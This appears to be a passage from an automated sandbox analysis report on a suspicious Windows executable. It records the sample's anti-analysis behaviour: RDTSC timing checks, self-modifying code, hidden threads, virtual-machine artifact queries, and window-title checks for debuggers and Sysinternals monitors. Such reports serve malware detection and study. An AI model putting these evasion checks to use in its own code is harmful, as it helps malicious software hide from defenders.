Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 75F07F4 second address: 75F0823 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], ebp 0x0000000b jmp 00007FC7F4B4AE7Dh 0x00000010 mov ebp, esp 0x00000012 jmp 00007FC7F4B4AE7Eh 0x00000017 pop ebp 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 75F0823 second address: 75F0827 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 75F0827 second address: 75F0844 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC7F4B4AE89h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 75F0844 second address: 75F0854 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC7F4EE1C4Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 75F0C17 second address: 75F0C32 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FC7F4B4AE7Bh 0x00000008 pop ecx 0x00000009 push edi 0x0000000a pop ecx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push ecx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 75F0C32 second address: 75F0C36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 75F0C36 second address: 75F0C53 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC7F4B4AE89h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 75F0C53 second address: 75F0CA5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC7F4EE1C51h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007FC7F4EE1C53h 0x00000015 adc cx, 2E5Eh 0x0000001a jmp 00007FC7F4EE1C59h 0x0000001f popfd 0x00000020 movzx eax, di 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 75F0CA5 second address: 75F0CC2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC7F4B4AE89h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 7640967 second address: 764096B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 764096B second address: 7640971 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 7640971 second address: 76409A4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edi, ecx 0x00000005 pushfd 0x00000006 jmp 00007FC7F4EE1C4Eh 0x0000000b or cl, 00000038h 0x0000000e jmp 00007FC7F4EE1C4Bh 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 mov dword ptr [esp], ebp 0x0000001a pushad 0x0000001b mov di, ax 0x0000001e push eax 0x0000001f push edx 0x00000020 mov ax, 79BDh 0x00000024 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 76409A4 second address: 76409B8 instructions: 0x00000000 rdtsc 0x00000002 movzx ecx, dx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 mov ebp, esp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov dx, si 0x00000010 mov di, si 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 7620008 second address: 762000C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 762000C second address: 762001E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC7F4B4AE7Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 762001E second address: 7620084 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FC7F4EE1C51h 0x00000009 sbb cl, 00000056h 0x0000000c jmp 00007FC7F4EE1C51h 0x00000011 popfd 0x00000012 mov eax, 6AAC2FC7h 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a xchg eax, ebp 0x0000001b jmp 00007FC7F4EE1C4Ah 0x00000020 push eax 0x00000021 jmp 00007FC7F4EE1C4Bh 0x00000026 xchg eax, ebp 0x00000027 pushad 0x00000028 pushad 0x00000029 push ecx 0x0000002a pop edx 0x0000002b mov ax, B5FDh 0x0000002f popad 0x00000030 jmp 00007FC7F4EE1C4Ah 0x00000035 popad 0x00000036 mov ebp, esp 0x00000038 push eax 0x00000039 push edx 0x0000003a push eax 0x0000003b push edx 0x0000003c pushad 0x0000003d popad 0x0000003e rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 7620084 second address: 7620088 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 7620088 second address: 762008E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 762008E second address: 762009D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC7F4B4AE7Bh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 762009D second address: 76200A1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 76200A1 second address: 76200E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 and esp, FFFFFFF0h 0x0000000b jmp 00007FC7F4B4AE85h 0x00000010 sub esp, 44h 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 call 00007FC7F4B4AE83h 0x0000001b pop esi 0x0000001c mov di, 5CDCh 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 76200E0 second address: 76200F5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC7F4EE1C51h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 76200F5 second address: 7620119 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC7F4B4AE81h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f mov di, 11BEh 0x00000013 mov dx, 8BCAh 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 7620119 second address: 762011F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 762011F second address: 7620123 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 7620123 second address: 7620173 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC7F4EE1C4Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007FC7F4EE1C4Bh 0x00000011 xchg eax, ebx 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 pushfd 0x00000016 jmp 00007FC7F4EE1C4Bh 0x0000001b or esi, 5E63B3CEh 0x00000021 jmp 00007FC7F4EE1C59h 0x00000026 popfd 0x00000027 mov dx, ax 0x0000002a popad 0x0000002b rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 7620173 second address: 762019B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC7F4B4AE7Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a jmp 00007FC7F4B4AE7Eh 0x0000000f push eax 0x00000010 pushad 0x00000011 mov ecx, edx 0x00000013 push eax 0x00000014 push edx 0x00000015 mov bh, DEh 0x00000017 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 762019B second address: 76201B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 xchg eax, esi 0x00000006 jmp 00007FC7F4EE1C51h 0x0000000b xchg eax, edi 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 76201B9 second address: 76201BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 76201BD second address: 76201C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 76201C1 second address: 76201C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 76201C7 second address: 76201CD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 76201CD second address: 76201D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 76201D1 second address: 76202B5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC7F4EE1C4Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007FC7F4EE1C4Bh 0x00000011 xchg eax, edi 0x00000012 pushad 0x00000013 push ecx 0x00000014 jmp 00007FC7F4EE1C4Bh 0x00000019 pop ecx 0x0000001a pushfd 0x0000001b jmp 00007FC7F4EE1C59h 0x00000020 and eax, 36EB3D86h 0x00000026 jmp 00007FC7F4EE1C51h 0x0000002b popfd 0x0000002c popad 0x0000002d mov edi, dword ptr [ebp+08h] 0x00000030 pushad 0x00000031 mov ecx, 780897D3h 0x00000036 pushad 0x00000037 pushfd 0x00000038 jmp 00007FC7F4EE1C56h 0x0000003d or eax, 03F58358h 0x00000043 jmp 00007FC7F4EE1C4Bh 0x00000048 popfd 0x00000049 pushad 0x0000004a popad 0x0000004b popad 0x0000004c popad 0x0000004d mov dword ptr [esp+24h], 00000000h 0x00000055 jmp 00007FC7F4EE1C54h 0x0000005a lock bts dword ptr [edi], 00000000h 0x0000005f pushad 0x00000060 movzx ecx, dx 0x00000063 mov cx, bx 0x00000066 popad 0x00000067 jc 00007FC864C13DE8h 0x0000006d pushad 0x0000006e mov di, F9A6h 0x00000072 call 00007FC7F4EE1C57h 0x00000077 push eax 0x00000078 push edx 0x00000079 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 76202B5 second address: 76202CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 pop edi 0x00000007 pushad 0x00000008 mov bh, 43h 0x0000000a push eax 0x0000000b push edx 0x0000000c call 00007FC7F4B4AE7Ah 0x00000011 pop esi 0x00000012 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 76202CC second address: 76202D0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 76202D0 second address: 7620323 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pop esi 0x00000008 jmp 00007FC7F4B4AE87h 0x0000000d pop ebx 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007FC7F4B4AE84h 0x00000015 sub ch, 00000008h 0x00000018 jmp 00007FC7F4B4AE7Bh 0x0000001d popfd 0x0000001e mov esi, 750C727Fh 0x00000023 popad 0x00000024 mov esp, ebp 0x00000026 push eax 0x00000027 push edx 0x00000028 push eax 0x00000029 push edx 0x0000002a push eax 0x0000002b push edx 0x0000002c rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 7620323 second address: 7620327 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 7620327 second address: 762032D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 76508AC second address: 76508B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 76508B0 second address: 76508B4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 76508B4 second address: 76508BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 76508BA second address: 76508F5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, 23C74150h 0x00000008 mov edi, 77E7227Ch 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push ebx 0x00000011 pushad 0x00000012 mov ecx, 4234B1BDh 0x00000017 mov si, ACB9h 0x0000001b popad 0x0000001c mov dword ptr [esp], ebp 0x0000001f jmp 00007FC7F4B4AE84h 0x00000024 mov ebp, esp 0x00000026 push eax 0x00000027 push edx 0x00000028 push eax 0x00000029 push edx 0x0000002a pushad 0x0000002b popad 0x0000002c rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 76508F5 second address: 76508F9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 76508F9 second address: 76508FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 76508FF second address: 765090E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC7F4EE1C4Bh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 765090E second address: 7650929 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FC7F4B4AE80h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 7650929 second address: 765092F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 764085D second address: 764086C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC7F4B4AE7Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 764086C second address: 7640898 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FC7F4EE1C4Fh 0x00000008 movzx ecx, bx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FC7F4EE1C51h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 7640898 second address: 764089D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 764089D second address: 7640934 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 call 00007FC7F4EE1C4Dh 0x00000009 pop ecx 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d xchg eax, ebp 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007FC7F4EE1C4Dh 0x00000015 jmp 00007FC7F4EE1C4Bh 0x0000001a popfd 0x0000001b call 00007FC7F4EE1C58h 0x00000020 call 00007FC7F4EE1C52h 0x00000025 pop ecx 0x00000026 pop edi 0x00000027 popad 0x00000028 mov ebp, esp 0x0000002a pushad 0x0000002b pushad 0x0000002c call 00007FC7F4EE1C4Ah 0x00000031 pop eax 0x00000032 mov ah, bl 0x00000034 popad 0x00000035 jmp 00007FC7F4EE1C4Ch 0x0000003a popad 0x0000003b pop ebp 0x0000003c push eax 0x0000003d push edx 0x0000003e jmp 00007FC7F4EE1C57h 0x00000043 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 7650ABA second address: 7650B09 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC7F4B4AE81h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b mov edx, ecx 0x0000000d mov ebx, ecx 0x0000000f popad 0x00000010 push eax 0x00000011 jmp 00007FC7F4B4AE85h 0x00000016 xchg eax, ebp 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007FC7F4B4AE88h 0x00000020 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 7650B09 second address: 7650B0F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 7650B0F second address: 7650B6B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC7F4B4AE7Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b jmp 00007FC7F4B4AE80h 0x00000010 push dword ptr [ebp+04h] 0x00000013 jmp 00007FC7F4B4AE80h 0x00000018 push dword ptr [ebp+0Ch] 0x0000001b pushad 0x0000001c pushfd 0x0000001d jmp 00007FC7F4B4AE7Eh 0x00000022 add ch, FFFFFFF8h 0x00000025 jmp 00007FC7F4B4AE7Bh 0x0000002a popfd 0x0000002b pushad 0x0000002c push eax 0x0000002d push edx 0x0000002e rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 7650BCD second address: 7650BEA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC7F4EE1C59h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Tries to evade debugger and weak emulator (self modifying code)
Source: C:\Users\user\Desktop\pCElIX19tu.exeSpecial instruction interceptor: First address: 156BCEB instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\pCElIX19tu.exeSpecial instruction interceptor: First address: 17954BD instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\pCElIX19tu.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
Source: C:\Users\user\Desktop\pCElIX19tu.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
Source: C:\Users\user\Desktop\pCElIX19tu.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
Source: C:\Users\user\Desktop\pCElIX19tu.exeCode function: 0_2_07630C3C rdtsc 0_2_07630C3C
Source: C:\Users\user\Desktop\pCElIX19tu.exeAPI coverage: 3.8 %
Source: C:\Users\user\Desktop\pCElIX19tu.exe TID: 4032Thread sleep time: -42021s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\pCElIX19tu.exe TID: 6640Thread sleep time: -30000s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\pCElIX19tu.exeLast function: Thread delayed
Source: C:\Users\user\Desktop\pCElIX19tu.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: pCElIX19tu.exe, pCElIX19tu.exe, 00000000.00000002.2554591976.00000000016EC000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: Amcache.hve.6.drBinary or memory string: VMware
Source: Amcache.hve.6.drBinary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.6.drBinary or memory string: vmci.syshbin
Source: Amcache.hve.6.drBinary or memory string: VMware, Inc.
Source: Amcache.hve.6.drBinary or memory string: VMware20,1hbin@
Source: Amcache.hve.6.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.6.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.6.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.6.drBinary or memory string: VMware-42 27 80 4d 99 30 0e 9c-c1 9b 2a 23 ea 1f c4 20
Source: pCElIX19tu.exeBinary or memory string: Hyper-V RAW
Source: Amcache.hve.6.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: pCElIX19tu.exe, 00000000.00000002.2554096574.00000000013FD000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: SYSINTERNALSNum_processorNum_ramnameallfreedriversNum_displaysresolution_xresolution_y\*recent_filesprocessesuptime_minutesC:\Windows\System32\VBox*.dll01vbox_firstSYSTEM\ControlSet001\Services\VBoxSFvbox_secondC:\USERS\PUBLIC\public_checkWINDBG.EXEdbgwireshark.exeprocmon.exex64dbg.exeida.exedbg_secdbg_thirdyadroinstalled_appsSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallSOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall%d%s\%sDisplayNameapp_nameindexCreateToolhelp32Snapshot failed.
Source: Amcache.hve.6.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.6.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.6.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: pCElIX19tu.exe, 00000000.00000002.2555383206.0000000001C71000.00000004.00000020.00020000.00000000.sdmp, pCElIX19tu.exe, 00000000.00000003.2470021536.0000000001C71000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: Amcache.hve.6.drBinary or memory string: vmci.sys
Source: pCElIX19tu.exe, 00000000.00000002.2554096574.00000000013FD000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: SYSTEM\ControlSet001\Services\VBoxSF
Source: Amcache.hve.6.drBinary or memory string: vmci.syshbin`
Source: Amcache.hve.6.drBinary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.6.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.6.drBinary or memory string: VMware20,1
Source: Amcache.hve.6.drBinary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.6.drBinary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.6.drBinary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.6.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.6.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.6.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.6.drBinary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.6.drBinary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.6.drBinary or memory string: VMware Virtual RAM
Source: Amcache.hve.6.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: pCElIX19tu.exe, 00000000.00000002.2554591976.00000000016EC000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: Amcache.hve.6.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
Source: C:\Users\user\Desktop\pCElIX19tu.exeSystem information queried: ModuleInformationJump to behavior
Source: C:\Users\user\Desktop\pCElIX19tu.exeProcess information queried: ProcessInformationJump to behavior

Anti Debugging

barindex
Hides threads from debuggers
Source: C:\Users\user\Desktop\pCElIX19tu.exeThread information set: HideFromDebuggerJump to behavior
Tries to detect sandboxes and other dynamic analysis tools (window names)
Source: C:\Users\user\Desktop\pCElIX19tu.exeOpen window title or class name: regmonclass
Source: C:\Users\user\Desktop\pCElIX19tu.exeOpen window title or class name: gbdyllo
Source: C:\Users\user\Desktop\pCElIX19tu.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\pCElIX19tu.exeOpen window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\pCElIX19tu.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\pCElIX19tu.exeOpen window title or class name: ollydbg
Source: C:\Users\user\Desktop\pCElIX19tu.exeOpen window title or class name: filemonclass
Source: C:\Users\user\Desktop\pCElIX19tu.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\pCElIX19tu.exeFile opened: NTICE
Source: C:\Users\user\Desktop\pCElIX19tu.exeFile opened: SICE
Source: C:\Users\user\Desktop\pCElIX19tu.exeFile opened: SIWVID
